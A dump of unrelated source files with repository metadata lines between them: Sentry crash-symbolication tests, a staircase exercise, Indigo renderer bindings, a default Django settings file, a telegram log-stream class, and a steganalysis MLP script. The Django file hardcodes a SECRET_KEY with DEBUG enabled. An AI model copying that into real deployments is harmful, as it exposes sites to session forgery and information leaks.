"abs_path": "/scripts/views.js",
"vars": {},
"module": None,
"filename": "../../sentry/scripts/views.js",
"colno": 16,
"in_app": True,
"lineno": 268
}
]
},
"type": "NSRangeException",
"mechanism": {
"posix_signal": {
"signal": 6,
"code": 0,
"name": "SIGABRT",
"code_name": None
},
"type": "cocoa",
"mach_exception": {
"subcode": 0,
"code": 0,
"exception": 10,
"exception_name": "EXC_CRASH"
}
},
"value": (
"*** -[__NSArray0 objectAtIndex:]: index 3 "
"beyond bounds for empty NSArray"
)
}
]
},
"contexts": {
"device": {
"model_id": "N102AP",
"model": "iPod7,1",
"arch": "arm64",
"family": "iPod"
},
"os": {
"version": "9.3.2",
"rooted": False,
"build": "13F69",
"name": "iOS"
}
}
}
resp = self._postWithHeader(event_data)
assert resp.status_code == 200
event = Event.objects.get()
bt = event.interfaces['sentry.interfaces.Exception'].values[0].stacktrace
frames = bt.frames
assert frames[0].function == '<redacted>'
assert frames[0].instruction_addr == '0x2ac28b8'
assert not frames[0].in_app
assert frames[1].function == 'real_main'
assert frames[1].filename == 'Foo.swift'
assert frames[1].lineno == 42
assert frames[1].colno == 23
assert frames[1].package == object_name
assert frames[1].instruction_addr == '0x100020014'
assert frames[1].in_app
assert frames[2].function == 'other_main'
assert frames[2].filename == 'Foo.swift'
assert frames[2].lineno == 82
assert frames[2].colno == 23
assert frames[2].package == object_name
assert frames[2].instruction_addr == '0x10002001c'
assert frames[2].in_app
assert frames[3].platform == 'javascript'
assert frames[3].abs_path == '/scripts/views.js'
assert frames[3].function == 'merge'
assert frames[3].lineno == 268
assert frames[3].colno == 16
assert frames[3].filename == '../../sentry/scripts/views.js'
assert frames[3].in_app
x = bt.get_api_context()
long_frames = x['frames']
assert long_frames[0]['instructionAddr'] == '0x002ac28b8'
assert long_frames[1]['instructionAddr'] == '0x100020014'
assert long_frames[2]['instructionAddr'] == '0x10002001c'
@patch.object(Symbolizer, '_symbolize_app_frame', sym_app_frame)
def test_in_app_function_name(self):
object_name = (
"/var/containers/Bundle/Application/"
"B33C37A8-F933-4B6B-9FFA-152282BFDF13/"
"SentryTest.app/SentryTest"
)
# '/var/containers/Bundle/Application/',
# '/private/var/containers/Bundle/Application/',
# (kscm_|kscrash_|KSCrash |SentryClient |RNSentry )
event_data = {
"sentry.interfaces.User": {
"ip_address": "31.172.207.97"
},
"extra": {},
"project": self.project.id,
"platform": "cocoa",
"debug_meta": {
"images": [
{
"type": "apple",
"cpu_subtype": 0,
"uuid": "C05B4DDD-69A7-3840-A649-32180D341587",
"image_vmaddr": 4294967296,
"image_addr": 4295098368,
"cpu_type": 16777228,
"image_size": 32768,
"name": object_name,
}
]
},
"contexts": {
"os": {
"name": "iOS",
"version": "9.3.0"
}
},
"sentry.interfaces.Exception": {
"values": [
{
"stacktrace": {
"frames": [
{
"function": "[RNSentry ]",
"abs_path": None,
"package": "/usr/lib/system/libdyld.dylib",
"filename": None,
"symbol_addr": "0x002ac28b4",
"lineno": None,
"instruction_addr": 4295098388,
},
{
"function": "[SentryClient ]",
"abs_path": None,
"package": "/usr/lib/system/libdyld.dylib",
"filename": None,
"symbol_addr": "0x002ac28b4",
"lineno": None,
"instruction_addr": 4295098388,
},
{
"function": "[kscrash_]",
"abs_path": None,
"package": "/usr/lib/system/libdyld.dylib",
"filename": None,
"symbol_addr": "0x002ac28b4",
"lineno": None,
"instruction_addr": 4295098388,
},
{
"function": "[kscm_]",
"abs_path": None,
"package": "/usr/lib/system/libdyld.dylib",
"filename": None,
"symbol_addr": "0x002ac28b4",
"lineno": None,
"instruction_addr": 4295098388,
},
{
"function": "[KSCrash ]",
"abs_path": None,
"package": "/usr/lib/system/libdyld.dylib",
"filename": None,
"symbol_addr": "0x002ac28b4",
"lineno": None,
"instruction_addr": 4295098388,
},
{
"function": "[KSCrash]",
"abs_path": None,
"package": "/usr/lib/system/libdyld.dylib",
"filename": None,
"symbol_addr": "0x002ac28b4",
"lineno": None,
"instruction_addr": 4295098388,
},
{
"function": "[KSCrashy]",
"abs_path": None,
"package": "/usr/lib/system/libdyld.dylib",
"filename": None,
"symbol_addr": "0x002ac28b4",
"lineno": None,
"instruction_addr": 4295098388,
},
]
},
"type": "NSRangeException",
"mechanism": {
"posix_signal": {
"signal": 6,
"code": 0,
"name": "SIGABRT",
"code_name": None
},
"type": "cocoa",
"mach_exception": {
"subcode": 0,
"code": 0,
"exception": 10,
"exception_name": "EXC_CRASH"
}
},
"value": (
"*** -[__NSArray0 objectAtIndex:]: index 3 "
"beyond bounds for empty NSArray"
)
}
]
},
"contexts": {
"device": {
"model_id": "N102AP",
"model": "iPod7,1",
"arch": "arm64",
"family": "iPod"
},
"os": {
"version": "9.3.2",
"rooted": False,
"build": "13F69",
"name": "iOS"
}
}
}
resp = self._postWithHeader(event_data)
assert resp.status_code == 200
event = Event.objects.get()
bt = event.interfaces['sentry.interfaces.Exception'].values[0].stacktrace
frames = bt.frames
assert not frames[0].in_app
assert not frames[1].in_app
assert not frames[2].in_app
assert not frames[3].in_app
assert not frames[4].in_app
assert frames[5].in_app
assert frames[6].in_app
def sym_mac_app_frame(self, instruction_addr, img, sdk_info=None):
object_name = (
"/Users/haza/Library/Developer/Xcode/Archives/2017-06-19/"
"CrashProbe 19-06-2017, 08.53.xcarchive/Products/Applications/"
"CrashProbe.app/Contents/Frameworks/"
"CrashLib.framework/Versions/A/CrashLib"
)
if not (4295098384 <= parse_addr(instruction_addr) < 4295098388):
return [{
'filename': 'Foo.swift',
'abs_path': 'Foo.swift',
'lineno': 82,
'colno': 23,
'package': object_name,
'function': 'other_main',
'symbol_addr': '0x1',
"instruction_addr": '0x1',
}]
return [{
'filename': 'Foo.swift',
'abs_path': 'Foo.swift',
'lineno': 42,
'colno': 23,
'package': object_name,
'function': 'real_main',
'symbol_addr': '0x1000262a0',
"instruction_addr": '0x100026330',
}]
@patch.object(Symbolizer, '_symbolize_app_frame', sym_mac_app_frame)
def test_in_app_macos(self):
object_name = (
"/Users/haza/Library/Developer/Xcode/Archives/2017-06-19/"
"CrashProbe 19-06-2017, 08.53.xcarchive/Products/Applications/"
"CrashProbe.app/Contents/Frameworks/"
"CrashLib.framework/Versions/A/CrashLib"
)
event_data = {
"sentry.interfaces.User": {
"ip_address": "31.172.207.97"
},
"extra": {},
"project": self.project.id,
"platform": "cocoa",
"debug_meta": {
"images": [
{
"type": "apple",
"cpu_subtype": 0,
"uuid": "C05B4DDD-69A7-3840-A649-32180D341587",
"image_vmaddr": 4294967296,
"image_addr": 4295098368,
"cpu_type": 16777228,
"image_size": 32768,
"name": object_name,
}
]
},
"sentry.interfaces.Exception": {
"values": [
{
"stacktrace": {
"frames": [
{
"function": "-[CRLCrashAsyncSafeThread crash]",
"abs_path": "/Users/haza/Projects/getsentry-CrashProbe/CrashProbe/CRLCrashAsyncSafeThread.m",
"package": "/Users/haza/Library/Developer/Xcode/Archives/2017-06-19/CrashProbe 19-06-2017, 08.53.xcarchive/Products/Applications/CrashProbe.app/Contents/Frameworks/CrashLib.framework/Versions/A/CrashLib",
"image_addr": "0x110121000",
"symbol_addr": "0x110122303",
"instruction_addr": 4295098388
},
{
"function": "[KSCrash ]",
"abs_path": None,
"package": "/usr/lib/system/libdyld.dylib",
"filename": None,
"symbol_addr": "0x002ac28b4",
"lineno": None,
"instruction_addr": 4295098388,
},
]
},
"type": "NSRangeException",
"mechanism": {
"posix_signal": {
"signal": 6,
"code": 0,
"name": "SIGABRT",
"code_name": None
},
"type": "cocoa",
"mach_exception": {
"subcode": 0,
"code": 0,
"exception": 10,
"exception_name": "EXC_CRASH"
}
},
"value": (
"*** -[__NSArray0 objectAtIndex:]: index 3 "
"beyond bounds for empty NSArray"
)
}
]
},
"contexts": {
"device": {
"family": "macOS",
"type": "device",
"storage_size": 498954403840,
"free_memory": 415174656,
"memory_size": 17179869184,
"boot_time": "2017-06-18T07:10:05Z",
"model": "MacBookPro13,1",
"usable_memory": 15204716544,
"arch": "x86"
},
"app": {
"app_version": "1.0",
"app_name": "CrashProbe",
"device_app_hash": "75e22adcce6cb4c81db7c7e623c2f2721616d2c8",
"executable_path": "/Users/haza/Library/Developer/Xcode/Archives/2017-06-19/CrashProbe 19-06-2017, 08.53.xcarchive/Products/Applications/CrashProbe.app/CrashProbe",
"build_type": "unknown",
"app_start_time": "2017-06-19T07:19:02Z",
"app_identifier": "net.hockeyapp.CrashProbe",
"type": "app",
"app_build": "1"
},
"os": {
"rooted": False,
"kernel_version": "Darwin Kernel Version 16.6.0: Fri Apr 14 16:21:16 PDT 2017; root:xnu-3789.60.24~6/RELEASE_X86_64",
"version": "10.12.5",
"build": "16F73",
"type": "os",
"name": "macOS"
}
},
}
resp = self._postWithHeader(event_data)
assert resp.status_code == 200
event = Event.objects.get()
bt = event.interfaces['sentry.interfaces.Exception'].values[0].stacktrace
frames = bt.frames
assert frames[0].in_app
class RealResolvingIntegrationTest(TestCase):
def test_real_resolving(self):
url = reverse(
'sentry-api-0-dsym-files',
kwargs={
'organization_slug': self.project.organization.slug,
'project_slug': self.project.slug,
}
)
self.login_as(user=self.user)
out = BytesIO()
f = zipfile.ZipFile(out, 'w')
f.write(os.path.join(os.path.dirname(__file__), 'fixtures', 'hello.dsym'),
'dSYM/hello')
f.close()
response = self.client.post(
url, {
'file':
SimpleUploadedFile('symbols.zip', out.getvalue(), content_type='application/zip'),
},
format='multipart'
)
assert response.status_code == 201, response.content
assert len(response.data) == 1
event_data = {
"project": self.project.id,
"platform": "cocoa",
"debug_meta": {
"images": [{
"type": "apple",
"arch": "x86_64",
"uuid": "502fc0a5-1ec1-3e47-9998-684fa139dca7",
"image_vmaddr": "0x0000000100000000",
"image_size": 4096,
"image_addr": "0x0000000100000000",
"name": "Foo.app/Contents/Foo"
}],
"sdk_info": {
"dsym_type": "macho",
"sdk_name": "macOS",
"version_major": 10,
"version_minor": 12,
"version_patchlevel": 4,
}
},
"sentry.interfaces.Exception": {
"values": [
{
'stacktrace': {
"frames": [
{
"function": "unknown",
"instruction_addr": "0x0000000100000fa0"
},
]
},
"type": "Fail",
"value": "fail"
}
]
},
}
resp = self._postWithHeader(event_data)
assert resp.status_code == 200
event = Event.objects.get()
bt = event.interfaces['sentry.interfaces.Exception'].values[0].stacktrace
frames = bt.frames
assert frames[0].function == 'main'
assert frames[0].filename == 'hello.c'
assert frames[0].abs_path == '/tmp/hello.c'
assert frames[0].lineno == 1
| 39.655635 | 240 | 0.363505 |
795acdf6f20909fabc83470fbd7e4a759e712ef9 | 579 | py | Python | staircase.py | Lucian-N/funBits | a5079167c7e42efd24b566e25b98b3546e7b0354 | [
"Apache-2.0"
] | null | null | null | staircase.py | Lucian-N/funBits | a5079167c7e42efd24b566e25b98b3546e7b0354 | [
"Apache-2.0"
] | null | null | null | staircase.py | Lucian-N/funBits | a5079167c7e42efd24b566e25b98b3546e7b0354 | [
"Apache-2.0"
] | null | null | null | '''
Consider a staircase of size :
#
##
###
####
Observe that its base and height are both equal to n=4, and the image is drawn using # symbols and spaces. The last line is not preceded by any spaces.
Write a program that prints a staircase of size .
'''
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the staircase function below.
def staircase(n):
block = "#"
for i in range(n):
space = " " * (n - i - 1)
print ( space + block * (i + 1))
if __name__ == '__main__':
n = int(input())
staircase(n)
| 17.545455 | 151 | 0.625216 |
795ace79a4aa5aab942ee64f94c4f266d95e2e6a | 5,844 | py | Python | api/python/indigo/renderer.py | tsingdao-Tp/Indigo | b2d73faebb6a450e9b3d34fed553fad4f9d0012f | [
"Apache-2.0"
] | null | null | null | api/python/indigo/renderer.py | tsingdao-Tp/Indigo | b2d73faebb6a450e9b3d34fed553fad4f9d0012f | [
"Apache-2.0"
] | null | null | null | api/python/indigo/renderer.py | tsingdao-Tp/Indigo | b2d73faebb6a450e9b3d34fed553fad4f9d0012f | [
"Apache-2.0"
] | null | null | null | #
# Copyright (C) from 2009 to Present EPAM Systems.
#
# This file is part of Indigo toolkit.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import platform
from ctypes import CDLL, POINTER, c_char_p, c_int
from indigo import IndigoException, DECODE_ENCODING
class IndigoRenderer(object):
def __init__(self, indigo):
self.indigo = indigo
if (
os.name == "posix"
and not platform.mac_ver()[0]
and not platform.system().startswith("CYGWIN")
):
self._lib = CDLL(indigo._dll_dir + "/libindigo-renderer.so")
elif os.name == "nt" or platform.system().startswith("CYGWIN"):
self._lib = CDLL(indigo._dll_dir + "/indigo-renderer.dll")
elif platform.mac_ver()[0]:
self._lib = CDLL(indigo._dll_dir + "/libindigo-renderer.dylib")
else:
raise IndigoException("unsupported OS: " + os.name)
self._lib.indigoRendererInit.restype = c_int
self._lib.indigoRendererInit.argtypes = []
self._lib.indigoRendererDispose.restype = c_int
self._lib.indigoRendererDispose.argtypes = []
self._lib.indigoRender.restype = c_int
self._lib.indigoRender.argtypes = [c_int, c_int]
self._lib.indigoRenderToFile.restype = c_int
self._lib.indigoRenderToFile.argtypes = [c_int, c_char_p]
self._lib.indigoRenderGrid.restype = c_int
self._lib.indigoRenderGrid.argtypes = [
c_int,
POINTER(c_int),
c_int,
c_int,
]
self._lib.indigoRenderGridToFile.restype = c_int
self._lib.indigoRenderGridToFile.argtypes = [
c_int,
POINTER(c_int),
c_int,
c_char_p,
]
self._lib.indigoRenderReset.restype = c_int
self._lib.indigoRenderReset.argtypes = []
# Init context
self.indigo._setSessionId()
self.indigo._checkResult(self._lib.indigoRendererInit())
self._initialized = True
def __del__(self):
if self._initialized:
self.indigo._setSessionId()
self.indigo._checkResult(self._lib.indigoRendererDispose())
self._initialized = False
def renderToBuffer(self, obj):
"""Renders object to buffer
Args:
obj (IndigoObject): object to render
Returns:
list: buffer with byte array
"""
self.indigo._setSessionId()
wb = self.indigo.writeBuffer()
try:
self.indigo._checkResult(self._lib.indigoRender(obj.id, wb.id))
return wb.toBuffer()
finally:
wb.dispose()
def renderToString(self, obj):
"""Renders object to string
Args:
obj (IndigoObject): object to render
Returns:
str: string with rendered data
"""
return self.renderToBuffer(obj).tobytes().decode(DECODE_ENCODING)
def renderToFile(self, obj, filename):
"""Renders to file
Args:
obj (IndigoObject): object to render
filename (str): full file path
"""
self.indigo._setSessionId()
self.indigo._checkResult(
self._lib.indigoRenderToFile(obj.id, filename.encode("ascii"))
)
def renderGridToFile(self, objects, refatoms, ncolumns, filename):
"""Renders grid to file
Args:
objects (IndigoObject): array of objects
refatoms (list): array or reference atoms
ncolumns (int): number of columns
filename (str): full file path
Raises:
IndigoException: if any error while rendering
"""
self.indigo._setSessionId()
arr = None
if refatoms:
if len(refatoms) != objects.count():
raise IndigoException(
"renderGridToFile(): refatoms[] size must be equal to the number of objects"
)
arr = (c_int * len(refatoms))()
for i in range(len(refatoms)):
arr[i] = refatoms[i]
self.indigo._checkResult(
self._lib.indigoRenderGridToFile(
objects.id, arr, ncolumns, filename.encode("ascii")
)
)
def renderGridToBuffer(self, objects, refatoms, ncolumns):
"""Renders grid to buffer
Args:
objects (IndigoObject): array of objects
refatoms (list): array or reference atoms
ncolumns (int): number of columns
Raises:
IndigoException: if any error while rendering
Returns:
list: buffer byte array
"""
self.indigo._setSessionId()
arr = None
if refatoms:
if len(refatoms) != objects.count():
raise IndigoException(
"renderGridToBuffer(): refatoms[] size must be equal to the number of objects"
)
arr = (c_int * len(refatoms))()
for i in range(len(refatoms)):
arr[i] = refatoms[i]
wb = self.indigo.writeBuffer()
try:
self.indigo._checkResult(
self._lib.indigoRenderGrid(objects.id, arr, ncolumns, wb.id)
)
return wb.toBuffer()
finally:
wb.dispose()
| 33.204545 | 98 | 0.592231 |
795ace88e1de4748df2b96a4d104c86ca5c4f848 | 3,092 | py | Python | mysite/mysite/settings.py | t2y/django-sample | 1b717f4ed67e73f0c507b6f83a1e946e4690e51e | [
"Apache-2.0"
] | null | null | null | mysite/mysite/settings.py | t2y/django-sample | 1b717f4ed67e73f0c507b6f83a1e946e4690e51e | [
"Apache-2.0"
] | null | null | null | mysite/mysite/settings.py | t2y/django-sample | 1b717f4ed67e73f0c507b6f83a1e946e4690e51e | [
"Apache-2.0"
] | null | null | null | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 3.1.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '2pydqxr4++(fq1n99_sm4r9f^^2hd)k=c3we-qbx)(%il@+2gp'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'polls.apps.PollsConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'ja-jp'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
| 25.344262 | 91 | 0.695666 |
795acee2295e2a9400d24eb157f335dabf56d1a5 | 886 | py | Python | pytglib/api/types/log_stream_file.py | iTeam-co/pytglib | e5e75e0a85f89b77762209b32a61b0a883c0ae61 | [
"MIT"
] | 6 | 2019-10-30T08:57:27.000Z | 2021-02-08T14:17:43.000Z | pytglib/api/types/log_stream_file.py | iTeam-co/python-telegram | e5e75e0a85f89b77762209b32a61b0a883c0ae61 | [
"MIT"
] | 1 | 2021-08-19T05:44:10.000Z | 2021-08-19T07:14:56.000Z | pytglib/api/types/log_stream_file.py | iTeam-co/python-telegram | e5e75e0a85f89b77762209b32a61b0a883c0ae61 | [
"MIT"
] | 5 | 2019-12-04T05:30:39.000Z | 2021-05-21T18:23:32.000Z |
from ..utils import Object
class LogStreamFile(Object):
"""
The log is written to a file
Attributes:
ID (:obj:`str`): ``LogStreamFile``
Args:
path (:obj:`str`):
Path to the file to where the internal TDLib log will be written
max_file_size (:obj:`int`):
The maximum size of the file to where the internal TDLib log is written before the file will be auto-rotated
Returns:
LogStream
Raises:
:class:`telegram.Error`
"""
ID = "logStreamFile"
def __init__(self, path, max_file_size, **kwargs):
self.path = path # str
self.max_file_size = max_file_size # int
@staticmethod
def read(q: dict, *args) -> "LogStreamFile":
path = q.get('path')
max_file_size = q.get('max_file_size')
return LogStreamFile(path, max_file_size)
| 23.945946 | 120 | 0.599323 |
795acf6aa44babe8a38e41613150da8518346c2f | 1,960 | py | Python | pyjobs_web/pyjobsweb/lib/helpers.py | pyjobs/web | 183742ae571ee83d4fe4b34f1f0ce9f2204c449e | [
"MIT"
] | 8 | 2016-01-29T13:06:26.000Z | 2020-11-02T07:23:57.000Z | pyjobs_web/pyjobsweb/lib/helpers.py | pyjobs/web | 183742ae571ee83d4fe4b34f1f0ce9f2204c449e | [
"MIT"
] | 18 | 2016-02-11T08:17:13.000Z | 2022-03-02T14:53:38.000Z | pyjobs_web/pyjobsweb/lib/helpers.py | pyjobs/web | 183742ae571ee83d4fe4b34f1f0ce9f2204c449e | [
"MIT"
] | 5 | 2016-02-05T08:57:12.000Z | 2018-01-15T08:19:43.000Z | # -*- coding: utf-8 -*-
"""Template Helpers used in pyjobsweb."""
import json
import logging
from datetime import datetime
from urllib import quote_plus
from markupsafe import Markup
from slugify import slugify as base_slugify
from tg import config
log = logging.getLogger(__name__)
jours = ["Lundi", "Mardi", "Mercredi", "Jeudi", "Vendredi", "Samedi", "Dimanche"]
mois = ["Janvier", u"Février", "Mars", "Avril", "Mai", "Juin", "Juillet", u"Août", "Septembtre", "Octobre", "Novembre", u"Décembre"]
def current_year():
now = datetime.now()
return now.strftime('%Y')
def icon(icon_name):
return Markup('<i class="glyphicon glyphicon-%s"></i>' % icon_name)
def slugify(string):
return base_slugify(string)
def to_json(data, **kwargs):
return json.dumps(data, **kwargs)
def french_day(day_number):
return jours[day_number-1]
def french_month(month_number):
if month_number == 1:
return mois[11]
return mois[month_number-1]
def head_js():
return config.get('site.head_js')
def get_job_url(job_id, job_title=None, previous=None, absolute=False):
job_url = "/jobs/details/%s" % job_id
if job_title:
job_url += "/%s" % slugify(job_title)
if previous:
job_url += "?previous=%s" % quote_plus(previous)
if absolute:
job_url = "%s%s" % (config.get('site.domain_base_url'), job_url)
return job_url
def get_company_url(company_id, previous=None, absolute=False):
company_url = '/societes-qui-recrutent/details/%s' % company_id
if previous:
company_url = '%s?previous=%s' % (company_url, quote_plus(previous))
if absolute:
company_url = '%s%s' % (config.get('site.domain_base_url'), company_url)
return company_url
# Import commonly used helpers from WebHelpers2 and TG
try:
from webhelpers2 import date, html, number, misc, text
except SyntaxError:
log.error("WebHelpers2 helpers not available with this Python Version")
| 25.789474 | 132 | 0.686224 |
795ad0213fb25fd6f2082b99042fa5aa26070448 | 1,713 | py | Python | MLP.py | AIKICo/Steganalysis-By-Frame | c2e1a20664056eb723c694949119a26f7fb6cfbc | [
"Apache-2.0"
] | 1 | 2019-03-25T07:20:05.000Z | 2019-03-25T07:20:05.000Z | MLP.py | MohMehrnia/Steganalysis-By-Frame | c2e1a20664056eb723c694949119a26f7fb6cfbc | [
"Apache-2.0"
] | 1 | 2020-01-29T07:12:02.000Z | 2020-01-29T07:12:02.000Z | MLP.py | MohMehrnia/Steganalysis-By-Frame | c2e1a20664056eb723c694949119a26f7fb6cfbc | [
"Apache-2.0"
] | null | null | null | import csv
import numpy as np
from sklearn.neural_network import MLPClassifier
from sklearn.metrics.classification import accuracy_score
from sklearn.metrics import classification_report
from sklearn.metrics import roc_curve
import matplotlib.pyplot as plt
from sklearn.metrics import roc_auc_score
def loaddata(filename,instanceCol):
file_reader = csv.reader(open(filename,'r'),delimiter=',')
x = []
y = []
for row in file_reader:
x.append(row[0:instanceCol])
y.append(row[-1])
return np.array(x[1:]).astype((np.float32)), np.array(y[1:]).astype(np.int)
def fractal_modeldata(filename):
scores = []
print(filename)
X, Y = loaddata(filename, 27)
np.random.seed(13)
indices = np.random.permutation(1127)
test_size = int(0.5 * len(indices))
X_train = X[indices[:-test_size]]
Y_train = Y[indices[:-test_size]]
X_test = X[indices[-test_size:]]
Y_test = Y[indices[-test_size:]]
classifier = MLPClassifier()
classifier.fit(X_train, Y_train)
Y_pred = classifier.predict(X_test)
print(classification_report(Y_test, Y_pred))
print(accuracy_score(Y_test, Y_pred)*100)
print(roc_auc_score(Y_test, np.asarray(Y_pred))*100)
if __name__ == '__main__':
root = 'D:\\\MySourceCodes\\Projects-Python\\Steganalysis-By-Frame\\SteganalysisDatasets\\Dataset\Fractal\\'
fractal_modeldata(root + 'noisyfractal-Features-steghide-100.csv')
fractal_modeldata(root + 'noisyfractal-Features-steghide-71.csv')
fractal_modeldata(root + 'noisyfractal-Features-steghide-42.csv')
fractal_modeldata(root + 'noisyfractal-Features-steghide-21.csv')
fractal_modeldata(root + 'noisyfractal-Features-steghide-7.csv')
| 34.959184 | 112 | 0.71979 |
795ad13df29051adecc0feb4961b4513c8ad48e2 | 969 | py | Python | azure/mgmt/network/v2016_09_01/models/route_table_paged.py | EnjoyLifeFund/macHighSierra-py36-pkgs | 5668b5785296b314ea1321057420bcd077dba9ea | [
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null | azure/mgmt/network/v2016_09_01/models/route_table_paged.py | EnjoyLifeFund/macHighSierra-py36-pkgs | 5668b5785296b314ea1321057420bcd077dba9ea | [
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null | azure/mgmt/network/v2016_09_01/models/route_table_paged.py | EnjoyLifeFund/macHighSierra-py36-pkgs | 5668b5785296b314ea1321057420bcd077dba9ea | [
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.paging import Paged
class RouteTablePaged(Paged):
"""
A paging container for iterating over a list of :class:`RouteTable <azure.mgmt.network.v2016_09_01.models.RouteTable>` object
"""
_attribute_map = {
'next_link': {'key': 'nextLink', 'type': 'str'},
'current_page': {'key': 'value', 'type': '[RouteTable]'}
}
def __init__(self, *args, **kwargs):
super(RouteTablePaged, self).__init__(*args, **kwargs)
| 34.607143 | 130 | 0.560372 |
795ad1ff11d085d82cb010b969753b94cbe06b53 | 1,007 | py | Python | fetch/api/resources/method.py | ziransun/wpt | ab8f451eb39eb198584d547f5d965ef54df2a86a | [
"BSD-3-Clause"
] | 2 | 2020-04-16T18:41:05.000Z | 2021-01-30T04:33:07.000Z | fetch/api/resources/method.py | ziransun/wpt | ab8f451eb39eb198584d547f5d965ef54df2a86a | [
"BSD-3-Clause"
] | 21 | 2021-03-31T19:48:22.000Z | 2022-03-12T00:24:53.000Z | fetch/api/resources/method.py | ziransun/wpt | ab8f451eb39eb198584d547f5d965ef54df2a86a | [
"BSD-3-Clause"
] | 1 | 2020-05-04T05:26:16.000Z | 2020-05-04T05:26:16.000Z | def main(request, response):
headers = []
if "cors" in request.GET:
headers.append(("Access-Control-Allow-Origin", "*"))
headers.append(("Access-Control-Allow-Credentials", "true"))
headers.append(("Access-Control-Allow-Methods", "GET, POST, PUT, FOO"))
headers.append(("Access-Control-Allow-Headers", "x-test, x-foo"))
headers.append(("Access-Control-Expose-Headers", "x-request-method"))
headers.append(("x-request-method", request.method))
headers.append(("x-request-content-type", request.headers.get("Content-Type", "NO")))
headers.append(("x-request-content-length", request.headers.get("Content-Length", "NO")))
headers.append(("x-request-content-encoding", request.headers.get("Content-Encoding", "NO")))
headers.append(("x-request-content-language", request.headers.get("Content-Language", "NO")))
headers.append(("x-request-content-location", request.headers.get("Content-Location", "NO")))
return headers, request.body
| 59.235294 | 97 | 0.678252 |
795ad287d7fef929a41a6b796609ec25addd0716 | 2,014 | py | Python | archiver/biosamples.py | DistPub/ingest-archiver | a88b32cab2d02b55196f01a78229f4bff8d9b927 | [
"Apache-2.0"
] | null | null | null | archiver/biosamples.py | DistPub/ingest-archiver | a88b32cab2d02b55196f01a78229f4bff8d9b927 | [
"Apache-2.0"
] | null | null | null | archiver/biosamples.py | DistPub/ingest-archiver | a88b32cab2d02b55196f01a78229f4bff8d9b927 | [
"Apache-2.0"
] | null | null | null | from copy import deepcopy
from archiver.dsp_post_process import dsp_attribute, fixed_dsp_attribute, taxon_id
from conversion.json_mapper import JsonMapper
from conversion.post_process import format_date, default_to
def _taxon(*args):
ontology_item = args[0]
if ontology_item:
genus_species = ontology_item[0]
return genus_species.get('ontology_label')
def derive_concrete_type(*args):
schema_url = args[0]
concrete_type = schema_url.split('/')[-1]
return dsp_attribute(concrete_type)
spec = {
'alias': ['biomaterial.uuid.uuid'],
'attributes': {
'Biomaterial Core - Biomaterial Id': ['biomaterial.content.biomaterial_core.biomaterial_id', dsp_attribute],
'HCA Biomaterial Type': ['biomaterial.content.describedBy', derive_concrete_type],
'HCA Biomaterial UUID': ['biomaterial.uuid.uuid', dsp_attribute],
'Is Living': ['biomaterial.content.is_living', dsp_attribute],
'Medical History - Smoking History': ['biomaterial.content.medical_history.smoking_history', dsp_attribute],
'Sex': ['biomaterial.content.sex', dsp_attribute],
'project': ['', fixed_dsp_attribute, 'Human Cell Atlas']
},
'description': ['biomaterial.content.biomaterial_core.biomaterial_description'],
'releaseDate': ['project.releaseDate', format_date],
# this is to work around this being constantly empty
'sampleRelationships': ['biomaterial.sampleRelationships', default_to, []],
'taxon': ['biomaterial.content.genus_species', _taxon],
